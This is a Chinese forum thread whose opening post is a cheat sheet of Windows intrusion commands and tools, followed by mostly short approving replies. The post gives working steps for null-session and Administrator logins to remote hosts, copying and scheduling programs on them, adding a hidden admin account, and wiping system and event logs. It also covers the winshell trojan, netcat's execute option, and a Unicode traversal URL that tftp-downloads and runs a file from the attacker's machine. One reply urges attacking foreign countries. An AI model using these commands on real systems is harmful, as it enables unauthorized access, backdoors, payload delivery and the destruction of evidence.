【IT】网管和黑客都必须知道的命令!看了不要做坏事! (31/922)

< 上一篇下一篇 >
本帖地址: 复制地址

修改 回帖 引用 楼主: 《●耐鮱蔢|&

用户形象图片

常用的几条NET命令:

==================================================


(与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""

(以管理员身份登录远程主机) net
use \\IP地址\ipc$ "密码" /use:"Administrator"

(传送文件到远程主机WINNT目录下)copy
本机目录路径\程序 \\IP地址\admin$

(查看远程主机时间) net time \\IP地址

(定时启动某个程序) at
\\IP地址 02:18 readme.exe

(查看共享) net view \\IP地址

(查看netbios工作组列表)
nbtstat -A IP地址

(将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$
""/user:"Administrator"

(这两条把自己增加到管理员组): net user 用户名 密码 /add


net localgroup Administrators 用户名 /add

(断开连接) net use
\\IP地址\ipc$ /delete


=====================================================

擦屁屁:


del C:\winnt\system32\logfiles\*.*

del
C:\winnt\system32\config\*.evt

del C:\winnt\system32\dtclog\*.*


del C:\winnt\system32\*.log

del C:\winnt\system32\*.txt


del C:\winnt\*.txt

del C:\winnt\*.log


============================

一、netsvc.exe


下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:

netsvc /list \\IP地址


netsvc schedule \\IP地址 /query

netsvc \\IP地址 schedule /start


二、OpenTelnet.exe

远程启动主机的Telnet服务,并绑定端口到7878,例如:


OpenTelnet \\IP地址 用户名 密码 1 7878

然后就可以telnet到主机的7878端口,进入DOS方式下:


telnet IP地址 7878

三、winshell.exe


一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:


p Path (查看winshell主程序的路径信息)

b reBoot (重新启动机器)

d shutDown
(关闭机器)

s Shell (执行后你就会看到可爱的“C:\>”)

x eXit
(退出本次登录会话,此命令并不终止winshell的运行)

CMD> <A href="http://.../srv.exe"
target=_blank>http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)


四、3389登陆器,GUI方式登录远程主机的

五、elsave.exe

事件日志清除工具


elsave -s \\IP地址 -l "application" -C

elsave -s \\IP地址 -l
"system" -C

elsave -s \\IP地址 -l "security" -C


执行后成功清除应用程序日志,系统日志,安全日志

六、hbulot.exe


开启win2kserver和winxp的3389服务

hbulot [/r]


使用/r表示安装完成后自动重起目标使设置生效。

七、nc.exe(netcat.exe)


一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。

想要连接到某处: nc [-options] hostname
port[s] [ports] ...

绑定端口等待连接: nc -l -p port [-options] [hostname] [port]


参数:

-e prog 程序重定向,一旦连接,就执行 [危险!!]

-g gateway
source-routing hop point[s], up to 8

-G num source-routing pointer: 4,
8, 12, ...

-h 帮助信息

-i secs 延时的间隔

-l 监听模式,用于入站连接


-n 指定数字的IP地址,不能用hostname

-o file 记录16进制的传输

-p port 本地端口号


-r 任意指定本地及远程端口

-s addr 本地源地址

-u UDP模式

-v
详细输出——用两个-v可得到更详细的内容

-w secs timeout的时间

-z 将输入输出关掉——用于扫描时


八、TFTPD32.EXE


把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:


http://IP地址/s
cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名
c:\winnt\system32\文件名

然后可以直接令文件运行:

<A href="http://ip/"
target=_blank>http://IP地址/s
cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名


九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。


一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。


一、一 Xscan命令行运行参数说明:


在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按""强行关闭程序。


1.命令格式: xscan -host [-]  [其他选项]

xscan -file  
[其他选项]

其中 含义如下:

-port :
检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);


-ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);

-ntpass :
检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);

-cgi :
检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);

-iis :
检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);

[其他选项]
含义如下:

-v: 显示详细扫描进度

-p: 跳过Ping不通的主机

-o: 跳过没有检测到开放端口的主机


-t : 指定最大并发线程数量和并发主机数量, 默认数量为100,10

讓LovEゞ瀡缘 (714465798) 于 2008-11-06 14:36:07 对此贴进行了编辑
回到帖子顶部

回帖 引用 1楼简单

用户形象图片

虽然有些看不懂,但还是要顶……
回到帖子顶部

回帖 引用 2楼『流☆蠡』

用户形象图片






回到帖子顶部

回帖 引用 3楼爱你就是这样

用户形象图片

额                         
回到帖子顶部

回帖 引用 4楼异度空间

用户形象图片

很好 顶一下了啊  
回到帖子顶部

回帖 引用 5楼◆◆◆。

用户形象图片

顶一下            听 
回到帖子顶部

回帖 引用 6楼@_@

用户形象图片

确定  空连接就那么好连接?
喜欢技术 不喜欢黑
回到帖子顶部

回帖 引用 7楼~蓝色梦缘~

用户形象图片

看不懂啊!可以在详细点吗
回到帖子顶部

回帖 引用 8楼♀星星点灯♀

用户形象图片

看来还是要学学黑了。真的象是在看天书。
回到帖子顶部

回帖 引用 9楼Destiny

用户形象图片

楼主很强大!
 这么多DOS都被你找出来了!!!
  
回到帖子顶部

回帖 引用 10楼淘得网名一个

用户形象图片

还真是的哈
菜鸟的福音
回到帖子顶部

回帖 引用 11楼ヮ 忈跳旋律

用户形象图片

不錯~~DOS   
回到帖子顶部

回帖 引用 12楼Ja藝son

用户形象图片

我看不懂怎么办啊?
回到帖子顶部

回帖 引用 13楼尒/tp杺/xin

用户形象图片

我喜欢啊。厉害我就是喜欢。
回到帖子顶部

回帖 引用 14楼陌上,花开

用户形象图片

呵呵,

LZ又拿小孩子的东西来了。

网上早就有了,

咱是不是应该出点新东西啦。?
回到帖子顶部

回帖 引用 15楼煙味ベ難尋び

用户形象图片

绝对要顶一下,这么好的帖子
回到帖子顶部

回帖 引用 16楼苦&咖啡&

用户形象图片

无语天书
回到帖子顶部

回帖 引用 17楼恍然、ナ悟

用户形象图片

恍然、ナ悟     恍然、ナ悟     恍然、ナ悟    恍然、ナ悟   恍然、ナ悟   恍然、ナ悟  
回到帖子顶部

回帖 引用 18楼℡龙┐少灬

用户形象图片

楼猪肯定经常黑人!
回到帖子顶部

回帖 引用 19楼哟 ﹏、 羙

用户形象图片

hsrwhraStuhedzrztgdggzrg
回到帖子顶部

回帖 引用 20楼∧-、遗憾

用户形象图片

不懂那。   又得10个字
回到帖子顶部

回帖 引用 21楼?陽寶寶

用户形象图片


  好东东,
      收藏了,
   
回到帖子顶部

回帖 引用 22楼雪鹰

用户形象图片

引用 ?陽寶寶 (594751693)在 2009年2月23日 14:07:47的发表:

  好东东,
      收藏了,
   

顶!
回到帖子顶部

回帖 引用 23楼XHLXPD

用户形象图片

呵呵!是IT行业的人差不多都懂!
回到帖子顶部

回帖 引用 24楼左--手攜愛

用户形象图片

不过大多数这些我都学过啦。。
但是,还可以咯。。
也为他人提供了一个学习的平台咯
回到帖子顶部

回帖 引用 25楼姓老名鷄

用户形象图片

                  
回到帖子顶部

回帖 引用 26楼嗳ㄨ蒶の飛

用户形象图片

看的不是太懂,还是顶
回到帖子顶部

回帖 引用 27楼我在那角等你

用户形象图片

我咋看不懂涅
回到帖子顶部

回帖 引用 28楼我在那角等你

用户形象图片

建议高手都去搞日本韩国或者美国的资料或者黑他们搞科技让他们知道中国人不吃素的改吃肉了
回到帖子顶部

回帖 引用 29楼我在那角等你

用户形象图片

强烈建议:电脑高手都去搞日本韩国或者美国的资料或者黑他们搞科技让他们知道中国人不吃素的改吃肉了
回到帖子顶部

回帖 引用 30楼︷d.調dё洋

用户形象图片

有些能看懂的   顶一下!!!
回到帖子顶部
个人信息
  • 荣誉+3
  • 荣誉+2
  • 荣誉+1
  • 荣誉-1
  • 荣誉-2
  • 荣誉-3
发表留言
  • 文章不错!
  • 精华好文!
  • 支持原创文章!
  • 帖子图文并茂,好!
  • 真知灼见,说得好!
  • 恶意广告
  • 违规内容
  • 严重灌水
  • 重复发帖
  • 标题党
你确定要删除此楼层吗
扣20点经验值

快速回复进入高级回复

插入图片 选择表情

验证码 看不清?换一张(不区分大小写)

[完成后按Ctrl+Enter发表]
[回复须知]